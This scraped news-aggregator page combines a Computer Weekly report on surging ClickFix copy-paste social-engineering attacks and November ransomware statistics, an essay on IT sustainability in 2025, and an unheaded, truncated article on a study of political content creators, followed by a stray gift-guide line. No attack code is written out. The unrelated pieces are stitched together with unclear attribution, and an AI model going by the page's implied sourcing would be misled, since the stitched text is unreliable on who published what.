Tech
ClickFix attacks that bypass cyber controls on the rise | Computer Weekly
So-called ClickFix or ClearFake attacks that bypass security controls and use unwitting victims to execute a cyber attack of their own accord are surging at the end of 2025, even outpacing phishing or clickjacking attacks, according to NCC Group’s latest monthly threat report.
First identified a couple of years ago, ClickFix attacks flooded the threat landscape during 2024, and their volume surged by over 500% in the first six months of 2025, said NCC.
Rather than relying on automated exploits or malicious attachments, ClickFix attacks exploit human fallibility by convincing their targets to manually execute attacks using tools like PowerShell, Windows Run box, or other shell utilities after luring them to compromised websites promising fake prompts that instruct them to copy a command into their Run dialogue or PowerShell window.
NCC said such attacks represent a marked shift in social engineering because the victims are acting entirely voluntarily – this is in contrast to phishing attacks in which the deception ends once credentials have been submitted, or clickjacking, where victims unknowingly engage.
“This shift challenges traditional detection models as the command originates from a trusted user process, rather than an untrusted download or exploit chain,” wrote the NCC team.
“Understanding and mitigating ClickFix attacks is crucial because it can bypass conventional defences,” they said. “Email filters, sandboxing and automated URL analysers cannot always flag a malicious action that is conducted manually by an end user. Once the payload is executed, attackers can deploy RATs, enabling persistence, credential harvesting and eventual ransomware deployment.”
Financially motivated cyber criminals have been quick to climb on board the ClickFix wagon, many of them operating in larger access broker ecosystems to sell on compromised endpoints to ransomware gangs.
The report details a number of such targeted ClickFix operations. One campaign, active from April 2025 until just a couple of months ago, targeted the hospitality sector and duped employees into spreading infostealer malware across multiple hotel chains. This campaign used the PureRAT remote access trojan (RAT) to steal the hotels’ Booking.com credentials and conduct downstream email and WhatsApp phishing attacks against guests.
Another campaign, run by Kimsuky, a North Korean state threat actor, prompted its victims to copy and paste bogus authentication codes into PowerShell after posing as a US national security aide trying to set up meetings on South Korean issues.
Defending against ClickFix attacks is largely a matter of attempting to cut down on an organisation’s exposure to malicious lures and deceptive landing sites by incorporating tools such as URL filtering, domain reputation controls, web-filtering and sandboxing. Tightening endpoint execution environments is also a must, as is strengthening user awareness and instructing all employees to treat any unsolicited copy-paste instruction as an attempted cyber attack.
Ransomware stats
The growth in ClickFix attacks came amid a plateauing of general cyber attack volumes during the past few weeks, with tracked ransomware hits falling 2% in November, NCC found.
The Qilin operation held firm as the most active gang observed in NCC’s telemetry, accounting for 101 attacks, followed by Cl0p with 98, Akira with 81, and INC Ransom with 49.
Additionally notable in November was the DragonForce gang – NCC attributed 19 attacks to it during the period, although it has claimed many more itself – which became one of the more prominent active cyber gangs this year thanks to its reliance on collaboration with highly skilled affiliates, among them Scattered Spider, the hacking collective that hit Marks & Spencer, among many others.
Although collaboration between threat actors is nothing new, NCC said that DragonForce’s activity showed how gangs can maximise such strategies to strengthen their capabilities.
This said, at the same time, DragonForce has also taken something of a sledgehammer to the concept of honour among thieves. In May, it was observed hacking and defacing the data leak sites of rival gangs, and at one point initiated a hostile takeover bid of the RansomHub crew.
NCC said this competitiveness may reflect the lowering of technical barriers to participation in the cyber criminal ecosystem. Attacking competitors, it suggested, may form part of a deterrence strategy to keep newcomers from establishing themselves.
Don’t be complacent
“Business leaders cannot afford to become complacent,” said Matt Hull, NCC global head of threat intel. “Threat groups are rapidly evolving, sharing tools and techniques, and already exploiting the festive period, when vigilance often drops.
“With the new Cyber Security and Resilience Bill and high-profile breaches at M&S, Co-op and JLR [Jaguar Land Rover] this year, organisations are under growing scrutiny to prove they have robust defences and incident response plans in place,” he added.
“As the holidays approach, staying alert to suspicious activity and strengthening security posture is as important as ever.”
Tech
IT Sustainability Think Tank: How IT sustainability entered the mandate era during 2025 | Computer Weekly
As the calendar turns the final pages on 2025, the information technology sector stands at a critical juncture regarding its environmental commitments. This year was not marked by technological breakthroughs solving decarbonisation, but by the decisive maturation of sustainability from a strategic differentiator into an operational and regulatory imperative.
This transition involved a painful reckoning with data complexity, supply chain reality, and the sheer energy appetite of modern computing, driven primarily by the rapid proliferation of artificial intelligence (AI).
We entered 2025 with goals framed by aspiration; we exit under the binding mandate of actuality. The central shift is profound: IT sustainability is no longer a parallel environmental, social and governance (ESG) initiative.
It has become deeply intertwined with core business continuity, geopolitical supply chain risk, and mandatory financial disclosure. While this shift signals progress, momentum is driven more by necessity and the threat of liability than by shared ethical commitment.
The conversation evolves from aspirational to accountable
The most profound shift over the past year has been the forced elevation of the sustainability dialogue directly onto the executive committee’s core risk portfolio. This movement is not voluntary; it is driven by impending regulation and the sobering realisation that environmental failure now carries direct, auditable financial penalties and board-level liability.
Only a year ago, discussions circled around unquantifiable reputational benefits. Today, the lexicon is dominated by acronyms signalling mandatory compliance: CSDDD, CSRD, and the tightening of the SBTi Net-Zero Standard V2. These frameworks compel executives to move past narratives and confront the granular, auditable data attached to every asset, vendor, and cloud usage.
For the CIO, this manifests in two critical areas. First, energy efficiency is decisively reframed as a cost of doing business, crucial for operational expenditure control amid volatile global energy markets. Second, the sudden energy demand of generative AI has triggered a rapid, internal debate on responsible compute architecture.
Leaders are increasingly compelled to justify AI investment not solely on traditional ROI, but via a nascent “return on compute” model that necessarily integrates and accounts for carbon expenditure. This makes the environmental cost of IT an integrated input in the total cost of ownership calculation, rather than a polite footnote.
Despite this high-level engagement, progress remains complicated. The IT function often lacks the authority to enforce change across complex internal silos, and the necessary budget and risk tolerance for truly transformative shifts remain stubbornly limited.
Genuine progress where the green shoots are taking hold
Despite systemic inertia, 2025 delivered solid, tangible progress in certain operational domains, offering a partial blueprint for future net-zero efforts. Our confidence is bolstered by three examples, though it is crucial to understand that wide-scale adoption across the average enterprise remains nascent and often confined to pilot programs:
1. Decoupling cloud growth from carbon: Hyperscale cloud providers have largely won the battle for renewable energy procurement. The next frontier — optimising physical operations — has seen enterprise engagement. We saw accelerated adoption of advanced liquid cooling technologies (still primarily concentrated in hyperscale environments, but critical for future AI scaling). Enterprises optimising workloads for low-carbon regions and utilising serverless architectures successfully decoupled rapid cloud expansion from a proportional rise in emissions. This success belongs predominantly to the hyperscalers, and enterprise optimisation remains an ongoing campaign.
2. Maturing the circular IT model (As-a-Service): The year 2025 saw the Managed Device-as-a-Service (MDaaS) model transition into a critical environmental enabler. By outsourcing the entire device lifecycle, enterprises commit practically to refurbishment and robust reverse logistics. Successful enterprises leverage these contracts to guarantee asset re-entry into the value chain via certified refurbishment, drastically reducing e-waste. The caveats are two-fold: MDaaS adoption is far from universal, and the verification of these circular chains still lacks necessary, robust third-party scrutiny.
3. The nascent rise of green software engineering: The formal emergence of green software engineering (GSE) is perhaps the most encouraging development. For too long, the environmental focus was only on hardware. This year, organisations began measuring code energy consumption — optimising algorithms and refactoring applications to reduce reliance on resource-intensive computing.
An important development this year was the publication of the W3C Web Sustainability Guidelines (WSG) Draft Note. Developed through a global, collaborative effort — in which I was pleased to participate — the guidelines offer a structured and internationally relevant set of best practices for reducing the environmental footprint of web products and services. While the scope focuses specifically on the web rather than the full breadth of enterprise IT, the Draft Note nonetheless represents a significant step forward for the industry.
The persistent gaps undermining net-zero momentum
For all the genuine acceleration, 2025 was equally defined by two persistent, critical gaps that threaten to derail net-zero pathways and demand urgent attention.
1. The Scope 3 emissions chasm: The most pervasive and frustrating gap remains the measurement and meaningful reduction of Scope 3 emissions, particularly from purchased goods and downstream asset end-of-life.
Despite regulatory urgency, the vast majority of enterprises still rely on highly aggregated, industry-average supplier data (spend-based or activity-based), which is neither auditable nor sufficient for mandatory disclosure. The necessary mechanism — detailed, granular product carbon footprints (PCF) provided by every vendor — is simply not available at scale or with sufficient fidelity.
The problem persists because it requires collaboration across complex, often proprietary global supply chains. Suppliers are reticent to disclose granular data, citing competitive concerns, while buyers lack the leverage to mandate it. The result is a ‘Scope 3 plateau’: targets are set, but underlying emissions remain stubbornly high, creating a significant credibility risk. We are still largely measuring a reflection, not the reality.
2. The generative AI energy debt: While AI is a powerful tool for sustainability optimisation, the immediate, unmanaged energy demand of Large Language Models (LLMs) represents a profound and growing gap. The speed of AI adoption, combined with the inherently expensive High-Performance Computing (HPC) required, creates an “energy debt” that offsets hard-won gains elsewhere.
The challenge is governance. Enterprises are deploying AI solutions without robust, mandatory policies on model selection, inference efficiency, or resource decommissioning. Crucially, most organisations remain focused on achieving initial ROI metrics, relegating energy efficiency to an optional performance tweak. Failure to enforce a framework for ‘responsible compute’ risks the transformative power of AI being negated by its own expanding environmental impact. This is the single greatest risk to the IT sector’s net-zero journey.
Strategic priorities for 2026 and beyond
As the IT Sustainability Think Tank looks towards 2026, the focus must shift from identifying the problem to systematically closing the remaining gaps with institutional discipline. We must treat these priorities as non-negotiable elements of future business resilience:
- Mandate data granularity for Scope 3: Leverage procurement influence to force supplier compliance on verifiable Product Carbon Footprints (PCF). The mandate must be non-negotiable, enforced with clear vendor scorecards and contractual requirements.
- Institutionalise green software engineering: Invest heavily in training and tooling to embed energy efficiency into the software development lifecycle (SDLC). Software architecture must be treated with the same environmental scrutiny as data centre cooling, making efficiency an audited requirement.
- Govern the AI energy cost: Implement a Responsible AI framework that includes mandatory energy consumption metrics and resource allocation policies for all Generative AI deployments.
The year 2025 was when IT sustainability moved into the board’s audit file. Next year must be the year we finally gather the granular data, enforce the necessary discipline, and manage the rapidly growing energy appetite of our own invention. The time for aspirational statements is definitively over; the urgent task now is to move these nascent efforts into full, verifiable accountability.
Donald Trump’s appearances on the podcasts of Joe Rogan and Theo Von, among others, were seen by many as a key part of securing his second term in office.
But while Trump was speculating about alien life on Mars with Rogan, he had a team of acolytes appearing on dozens, if not hundreds, of much smaller niche podcasts hosted by right-wing content creators who typically don’t talk about politics.
This is how, just six days before the election, Kash Patel, the man now struggling to run the FBI, ended up appearing on the Deplorable Discussions livestream, a fringe, QAnon-infused show hosted on a platform called Pilled.
“The Deep State exists,” Patel told the audience. “It’s a Democratic-Republican uniparty swamp monster machine.”
At the time, there was no hard evidence behind an idea the Trump campaign appeared to understand instinctively: Social media creators, especially those who do not typically speak about politics, have an extraordinary ability to sway their audiences.
Now we have that evidence.
A new report, shared exclusively with WIRED and published today by researchers from Columbia and Harvard, is a first-of-its-kind study designed to measure the impact influencers and online creators can have on their audiences.
The study was conducted with 4,716 Americans aged between 18 and 45, most of whom were randomly assigned a list of progressive content creators to follow. Over the course of five months, from August to December 2024, these creators produced nonpartisan content designed to educate followers rather than explicitly advocate for a specific political viewpoint.
The results showed that exposure to these progressive-minded creators not only increased general political knowledge, but also shifted followers’ policy and partisan views to the left.
In contrast, a placebo group that was not assigned any creators to follow but was allowed to scroll social media as normal “showed significant rightward movement,” which researchers said was related to the right-leaning nature of social media networks.
For the study’s authors, and experts who have reviewed the research, the findings confirm that not only are influencers now potentially more powerful than traditional media, but content creators who rarely share political content may be the most powerful of all.
“The research concretizes what a lot of people have been hypothesizing, which is that content creators are a powerful force in politics, and they are absolutely going to play a big role in the 2026 midterms, and they will play an even bigger role in the 2028 elections,” says Samuel Woolley, an associate professor at the University of Pittsburgh who studies digital propaganda and who reviewed the research.
The Politics Paradox
As well as trying to prove that social media influencers can shape public opinion, the researchers also wanted to find out if those creators were more or less influential when their content is more overtly political.
To do this, the researchers randomly assigned the study’s participants a list of creators to follow, with some being assigned creators who mainly post about political issues, while others were assigned creators who are predominantly apolitical in their output.
From tinned fish to baked goodies, you can deliver the best-tasting treats to their door—even if you don’t live close by.
Source link
IT Sustainability Think Tank: How IT sustainability entered the mandate era during 2025 | Computer Weekly
Timothee Chalamet recreates Kylie Jenner moment with special guest
Nigeria files complaint to FIFA over Congo DR
-
Politics7 days agoTrump launches gold card programme for expedited visas with a $1m price tag
-
Tech1 week agoJennifer Lewis ScD ’91: “Can we make tissues that are made from you, for you?”
-
Business4 days agoHitting The ‘High Notes’ In Ties: Nepal Set To Lift Ban On Indian Bills Above ₹100
-
Business1 week agoRivian turns to AI, autonomy to woo investors as EV sales stall
-
Sports7 days agoPolice detain Michigan head football coach Sherrone Moore after firing, salacious details emerge: report
-
Fashion7 days agoTommy Hilfiger appoints Sergio Pérez as global menswear ambassador
-
Tech1 week agoGoogle DeepMind partners with UK government to deliver AI | Computer Weekly
-
Business7 days agoCoca-Cola taps COO Henrique Braun to replace James Quincey as CEO in 2026